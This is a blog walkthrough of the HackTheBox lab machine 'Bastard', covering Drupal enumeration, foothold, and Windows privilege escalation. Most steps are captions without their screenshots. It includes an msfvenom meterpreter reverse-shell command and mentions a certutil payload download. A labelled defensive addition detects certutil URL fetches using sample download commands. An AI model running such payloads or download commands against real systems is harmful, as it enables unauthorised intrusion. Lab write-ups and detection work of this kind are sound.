HacktheBox Bastard Walkthrough

    The other day, a friend asked if I was on HacktheBox and I was reminded that I'd been absent for a while.  Apparently, they are cranking out a new box every week which could be good or bad -- I'm not really sure.  While looking for something to write, I thought I'd take on one of their retired boxes and that would solve two "needs" simultaneously.  

    This box was interesting mostly because of the hunt for the exploit to gain a foothold on the system.  From there, it was trial and error as to which technique would work for a particular task.  After that, root was easy.

    First, we kick off with Nmap:

    Right off the bat, we see that the target is running Windows / IIS and Drupal.

    We check out the Drupal site:

    We get the Drupal version:

    We run Droopescan:

    We search through Searchsploit:

    We find a vulnerability in Services with an exploit which does not work.  I tried troubleshooting the issue but no such luck.  I then go hunting the web and I find:

    Let's see if we can get a simple "whoami":


    Next, let's check out the architecture:

    We need a reverse shell:

    msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows LHOST= LPORT=443 -f exe >> mshell443.exe

    I realize I have a shell with that name and I rename my shell to bastard.exe.

    After some trial and error with downloading the file, certutil proves to be the winner.  

    We move the shell to our victim:

    We check the directory as a sanity check.  I should also point out that I created that directory earlier. 
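
    From the defender's side, the certutil download described above is visible in process-creation logs. The following is an added example, not part of the original post: it flags certutil invocations that reference a remote URL and raises the severity when the parent is a web server process, as it would be when the command comes through a web application. The event field names, the parent-process list, and the sample events are assumptions constructed for illustration.

```python
import re

# certutil options that pull remote content; certutil accepts "-" or "/" prefixes.
FETCH_OPT = re.compile(r"(?<!\S)[-/](urlcache|verifyctl)\b", re.I)
URL = re.compile(r"""\b(?:https?|ftp)://[^\s"']+""", re.I)
CERTUTIL_WORD = re.compile(r"\bcertutil(\.exe)?\b", re.I)
# Assumed list of web-server / script-handler processes; adjust per environment.
WEB_PARENTS = {"w3wp.exe", "php-cgi.exe", "php.exe", "httpd.exe"}

def basename(path):
    return re.split(r"[\\/]", path.strip('"'))[-1].lower()

def involves_certutil(ev):
    # Match by image name, by PE OriginalFileName (survives a renamed copy),
    # or by a wrapper such as "cmd.exe /c certutil ...".
    names = {basename(ev.get("image", "")), ev.get("original_file_name", "").lower()}
    return "certutil.exe" in names or bool(CERTUTIL_WORD.search(ev.get("command_line", "")))

def classify(ev):
    """Return (severity, reasons) for one process-creation event dict."""
    cmd = ev.get("command_line", "")
    url = URL.search(cmd)
    if not involves_certutil(ev) or not url:
        return ("none", [])
    reasons = ["remote URL " + url.group(0)]
    opt = FETCH_OPT.search(cmd)
    if opt:
        reasons.append("fetch option " + opt.group(1).lower())
    if basename(ev.get("parent_image", "")) in WEB_PARENTS:
        reasons.append("parent is a web server process")
        return ("high", reasons)
    return ("medium", reasons)

# Constructed sample events (field names are assumptions modelled on Sysmon event ID 1).
EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\php\php-cgi.exe",
     "command_line": r"cmd.exe /c certutil -urlcache -split -f http://192.0.2.10/sample.exe C:\Temp\sample.exe"},
    {"image": r"C:\Windows\System32\certutil.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"certutil -hashfile C:\Temp\sample.exe SHA256"},
    {"image": r"C:\Temp\cu.exe", "original_file_name": "CertUtil.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"cu.exe /verifyctl -f -split https://192.0.2.10/x"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(classify(ev), ev["command_line"])
```

    The local hashing call in the second event is deliberately left unflagged, since certutil has routine administrative uses that involve no URL.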

    We execute our shell:

    With our handler set up:

    We catch the inbound connection:

    We move to Exploit Suggester:

    For some reason, ms16-075 does not work.  I move to ms16-014:

    And... we're root!  

    © 2020 sevenlayers.com